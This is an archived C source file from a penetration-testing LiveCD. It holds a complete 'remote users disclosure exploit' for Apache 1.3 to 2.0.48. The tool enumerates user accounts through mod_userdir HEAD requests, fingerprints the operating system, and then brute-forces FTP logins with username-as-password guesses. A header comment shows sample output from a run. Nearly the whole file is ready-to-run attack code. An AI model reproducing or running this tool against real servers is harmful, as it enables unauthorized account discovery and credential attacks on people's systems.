home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / apache / apacheIddisclosure.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  6.8 KB  |  303 lines
  1. /* m00-apache-w00t.c
  2. *
  3. * Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
  4. * ~ Proof-of-Concept edition ~
  5. *
  6. * This tool scans remote hosts with httpd (apache) and disclosure information
  7. * about existens users accounts via wrong default configuration of mod_userdir
  8. * (default apache module). Then attempts to log on ftp with found logins.
  9. *
  10. * Works only against Linux and *BSD boxes.
  11. * Info: http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0065.html
  12. * This is old, but curentlly still actual problem, because 99% of all admins use
  13. * default configuration of apache http server.
  14. *
  15. * This tool scans remote hosts with httpd (apache) and disclosure information 
  16. * about existens users accounts via wrong default configuration of mod_userdir 
  17. * (default apache module). Then attempts to log on ftp with found logins.
  19. * -d4rkgr3y
  20. *
  21. * sh-2.05b$ ./m00-apache-w00t -t localhost -u test_userlist.txt -b
  23. * [*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
  25. * [*] Checking http server [localhost:80]...
  26. * Apache => yes
  27. * Vulnerable => yes
  28. * OS => Mandrake Linux
  29. * [*] Searching for system accounts...
  30. * sergey =>
  31. * m00 =>
  32. * satan => yes
  33. * evil =>
  34. * poison =>
  35. * god =>
  36. * guest =>
  37. * dima =>
  38. * ftp => yes
  39. * vasya =>
  40. * rst =>
  41. * vasi =>
  42. * [*] Searching complete.
  43. * 12 users checked
  44. * 2 users found
  45. * [*] Attempting to log on ftp with login:login...
  46. * satan:satan => no
  47. * ftp:ftp => no
  48. * [*] Complete.
  49. * 0 ftp accounts found
  51. */
  52.  
  53. #include <stdio.h>
  54. #include <stdlib.h>
  55. #include <unistd.h>
  56. #include <errno.h>
  57. #include <sys/socket.h>
  58. #include <sys/types.h>
  59. #include <netinet/in.h>
  60. #include <netdb.h>
  61.  
  62. #define DEFAULT_HTTP_PORT 80
  63. #define DEFAULT_FTP_PORT 21
  64.  
  65. int m00() {
  66. printf("\n[*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.\n\n");
  67. printf("\n[*] Downloaded on www.K-OTIK.com\n\n");
  68. }
  69.  
  70. int verbose(char *d) {
  71. printf("+-----------------------o0o-----------------------+\n");
  72. printf("\n%s",d);
  73. printf("+-----------------------o0o-----------------------+\n");
  74. }
  75.  
  76. int usage(char *xplname) {
  77. printf("[~] usage: %s -t <host> -u <userlist> [options]\n\n",xplname);
  78. printf("Options:\n");
  79. printf("-p <port> - http port [80]\n");
  80. printf("-l <log_file> - log all attempts to file\n");
  81. printf("-b - try to log on ftp with guessed logins (public version only login:login)\n");
  82. printf("-h - usage\n");
  83. printf("\n");
  84. exit(0);
  85. }
  86.  
  87. int attempt(char *argv);
  88.  
  89. int conn(char *ip, unsigned short port) {
  90. struct hostent *hs;
  91. struct sockaddr_in sock;
  92. int sockfd;
  93. bzero(&sock, sizeof(sock));
  94. sock.sin_family = AF_INET;
  95. sock.sin_port = htons(port);
  96. if ((sock.sin_addr.s_addr=inet_addr(ip))==-1) {
  97. if ((hs=gethostbyname(ip))==NULL) {
  98. perror("[-] Error"); exit(0);
  99. }
  100. sock.sin_family = hs->h_addrtype;
  101. memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
  102. }
  103. if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
  104. perror("[-] Error"); exit(0);
  105. }
  106. if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
  107. perror("[-] Error "); exit(0);
  108. }
  109. return(sockfd);
  110. }
  111.  
  112.  
  113. int main(int argc, char *argv[]) {
  114. FILE *userlist, *logfile;
  115. char *file=NULL;
  116. char *lfile=NULL;
  117. char *host=NULL;
  118. char buf[0x20], check[0x20], request[0xc8], answer[0x3e8], c,logd[0x30];
  119. int i,hand,x,f,v=0,brute=0;
  120. int port = DEFAULT_HTTP_PORT;
  121. int fport = DEFAULT_FTP_PORT;
  122.  
  123. char c200[0x05] =
  124. "\x20\x32\x30\x30\x20";
  125. char c403[0x0e] =
  126. "\x34\x30\x33\x20\x46\x6f"
  127. "\x72\x62\x69\x64\x64\x65\x6e";
  128. char c404[0x0e] =
  129. "\x34\x30\x34\x20\x4e\x6f\x74"
  130. "\x20\x46\x6f\x75\x6e\x64";
  131. char signature[0x0f] =
  132. "\x53\x65\x72\x76\x65\x72\x3a"
  133. "\x20\x41\x70\x61\x63\x68\x65";
  134. char *http =
  135. "Accept: */*\r\n"
  136. "Accept-Language: en-us,en;q=0.5\r\n"
  137. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
  138. "User-Agent: m00-apache-finger\r\n"
  139. "Connection: close\r\n\r\n";
  140. char **logz;
  141.  
  142. m00();
  143.  
  144. if(argc<2) usage(argv[0]);
  145. while((c = getopt(argc, argv, "t:u:hp:vbl:"))!= EOF) {
  146. switch (c) {
  147. case 't':
  148. host=optarg;
  149. break;
  150. case 'u':
  151. file=optarg;
  152. break;
  153. case 'p':
  154. port=atoi(optarg);
  155. break;
  156. case 'l':
  157. lfile=optarg;
  158. break;
  159. case 'b':
  160. brute=1;
  161. break;
  162. case 'v':
  163. v=1;
  164. break;
  165. case 'h':
  166. usage(argv[0]);
  167. return 1;
  168. default:
  169. usage(argv[0]);
  170. return 1;
  171. }
  172. }
  173.  
  174. if(host==NULL) { usage(argv[0]); }
  175. if(file==NULL) { usage(argv[0]); }
  176.  
  177. if(lfile && (logfile = fopen(lfile, "a")) == 0) {
  178. printf("[-] unable to open logfile [%s]\n",lfile);
  179. exit(0);
  180. }
  181.  
  182. if((userlist = fopen(file, "r")) == 0) {
  183. printf("[-] unable to open userlist [%s]\n",file);
  184. exit(0);
  185. }
  186.  
  187. logz = (char **)malloc(0x666);
  188.  
  189. printf("[*] Checking http server [%s:%i]...\n",host,port);
  190.  
  191. hand = conn(host,port);
  192. sprintf(request,"HEAD /~root HTTP/1.1\r\nHost: %s\r\n%s",host,http);
  193.  
  194. write(hand,request,strlen(request));
  195. recv(hand,answer,0x3e8,0);
  196.  
  197. if(v) verbose(answer);
  198.  
  199. printf(" Apache => ");
  200. if(!strstr(answer,signature)) { printf(" no\n Vulnerable => "); } else printf(" yes\n Vulnerable => ");
  201. if(!strstr(answer,c403)) { printf("no\n[-] Exiting...\n"); exit(0); } else printf("yes\n");
  202. close(hand);
  203.  
  204. hand = conn(host,port);
  205. sprintf(request,"HEAD /~toor HTTP/1.1\r\nHost: %s\r\n%s",host,http);
  206. write(hand,request,strlen(request));
  207. recv(hand,answer,0x3e8,0);
  208.  
  209. if(v) verbose(answer);
  210.  
  211. printf(" OS => ");
  212. if(strstr(answer,c403)) { printf("FreeBSD"); } else {
  213. if(strstr(answer,"Unix")) printf("Unix unknow");
  214. if(strstr(answer,"Debian")) printf("Debian Linux");
  215. if(strstr(answer,"RedHat")) printf("RedHat Linux");
  216. if(strstr(answer,"mdk")) printf("Mandrake Linux");
  217. }
  218. close(hand);
  219.  
  220. printf("\n[*] Searching for system accounts...");
  221.  
  222. if(lfile) {
  223. sprintf(logd,"Host: %s\nFound accounts:\n",host);
  224. fprintf(logfile,logd);
  225. }
  226.  
  227.  
  228. x=0;
  229. f=0;
  230. while (1) {
  231. fgets(buf, 32, userlist);
  232. if (buf[0] == '\n' || strstr(check,buf)) break;
  233. strcpy(check,buf);
  234. buf[strlen(buf)-1] = '\0';
  235. x++;
  236.  
  237. printf("\n %s \t=> ",buf);
  238.  
  239.  
  240. hand = conn(host,port);
  241. sprintf(request,"HEAD /~%s HTTP/1.1\r\nHost: %s\r\n%s",buf,host,http);
  242.  
  243. write(hand,request,strlen(request));
  244. recv(hand,answer,0x3e8,0);
  245.  
  246. if(v) verbose(answer);
  247.  
  248. if(!strstr(answer,c404)) {
  249. printf(" yes",buf);
  250. if(lfile) {
  251. sprintf(logd,"%s\n",buf);
  252. fprintf(logfile,logd);
  253. }
  254. logz[f] = (char *)malloc(strlen(buf));
  255. memcpy(logz[f],buf,strlen(buf));
  256. memset(logz[f]+strlen(buf),0x0,1);
  257. f++;
  258. }
  259. close(hand);
  260. }
  261. fclose(userlist);
  262. printf("\n[*] Searching complete.\n");
  263. printf(" %i users checked\n %i users found\n",x,f);
  264. if(brute && f>0) {
  265. x=0;
  266. i=0;
  267. if(lfile) {
  268. sprintf(logd,"FTP:\n");
  269. fprintf(logfile,logd);
  270. }
  271. printf("[*] Attempting to log on ftp with login:login...\n");
  272. while(x!=f) {
  273. printf(" %s:%s \t=>",logz[x],logz[x]);
  274. hand = conn(host,fport);
  275.  
  276. sprintf(request,"USER %s\n",logz[x]);
  277. write(hand,request,strlen(request));
  278. recv(hand,answer,0x3e8,0);
  279.  
  280. sprintf(request,"PASS %s\n",logz[x]);
  281. write(hand,request,strlen(request));
  282. recv(hand,answer,0x3e8,0);
  283. if(strstr(answer,"230")) {
  284. printf(" yes\n");
  285. if(lfile) {
  286. sprintf(logd,"%s:%s\n",logz[x],logz[x]);
  287. fprintf(logfile,logd);
  288. }
  289. i++;
  290. } else printf(" no\n");
  291. close(hand);
  292. x++;
  293. }
  294. printf("[*] Complete.\n");
  295. printf(" %i ftp accounts found\n",i);
  296. }
  297. if(lfile) {
  298. fprintf(logfile,"\n");
  299. fclose(logfile);
  300. }
  301.  
  302. }
  303.